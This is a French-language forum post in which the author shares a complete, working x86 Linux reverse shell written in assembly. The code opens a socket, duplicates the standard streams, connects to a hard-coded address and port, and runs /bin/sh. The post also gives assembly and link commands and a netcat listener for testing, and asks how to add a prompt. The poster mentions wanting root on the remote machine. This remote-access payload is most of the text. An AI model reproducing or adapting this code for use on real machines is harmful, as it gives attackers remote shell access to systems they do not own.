Bonjour je programme un reverse shell en assembleur. Il est fonctionnel mais il me manque le prompt et malgré mes essais je n'arrive pas à le faire.
J'ai pensé à juste afficher un *$* mais je me dis que c'est tr op simple. Si j'essayais de passer root sur la machine distante est-ce *$* passera à *#*.
Voici mon code actuel :
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
 
 
global _start
 
section .text
 
_start:
 
	; host
	push 0x0101017f		; IP Number "127.1.1.1" in hex reverse order
	pop esi
 
	; port
	push WORD 0x03d9	; Port Number 55555 in hex reverse order
	pop edi
 
 
        ; syscalls (/usr/include/asm/unistd_32.h)
        ; socketcall numbers (/usr/include/linux/net.h)
 
        ; Creating the socket file descriptor
        ; int socket(int domain, int type, int protocol);
        ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
 
	push 102
	pop eax			; syscall 102 - socketcall
	cdq
 
	push 1
	pop ebx			; socketcall type (sys_socket 1)
 
	push edx		; IPPROTO_IP = 0 (int)
	push ebx		; SOCK_STREAM = 1 (int)
	push 2			; AF_INET = 2 (int)
 
finalint:
 
	mov ecx, esp		; ptr to argument array
	int 0x80		; kernel interruption
 
	xchg ebx, eax		; set ebx with the sockfd
 
 
	; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
	; int dup2(int oldfd, int newfd);
	; dup2 (clientfd, ...)
 
	pop ecx
 
dup_loop:
        mov al, 63		; syscall 63 - dup2
        int 0x80
 
        dec ecx
        jns dup_loop
 
 
	; Connecting the duplicated file descriptor to the host
	; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
	; connect(sockfd, [AF_INET, 55555, 127.1.1.1], 16)
 
	mov al, 102		; syscall 102 - socketcall
				; socketcall type (sys_connect) 3 - ebx already has it
 
	; host address structure
	push esi		; IP number
	push di			; port in byte reverse order = 55555 (uint16_t)
	push WORD 2		; AF_INET = 2 (unsigned short int)
	mov ecx, esp		; struct pointer
 
	; connect arguments
	push 16			; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
	push ecx		; sockaddr_in struct pointer (struct sockaddr *)
	push ebx		; socket fd (int)
 
	mov ecx, esp
 
	int 0x80
 
        ; Finally, using execve to substitute the actual process with /bin/sh
        ; int execve(const char *filename, char *const argv[], char *const envp[]);
        ; exevcve("/bin/sh", NULL, NULL)
 
        mov al, 11		; execve syscall
 
	; execve string argument
        push edx		; null-byte
        push 0x68732f2f		; "//sh"
        push 0x6e69622f		; "/bin"
 
        mov ebx, esp		; ptr to ["bin//sh", NULL] string
        push edx		; null ptr to argv
        push ebx		; null ptr to envp
 
	jmp finalint		; and jump to bingo
Pour le tester :
Compilation : nasm -f elf32 reverse.asm && ld -m elf_i386 reverse.osur un autre terminal : nc -lvp 55555

Nom : help.PNG Affichages : 410 Taille : 439,2 Ko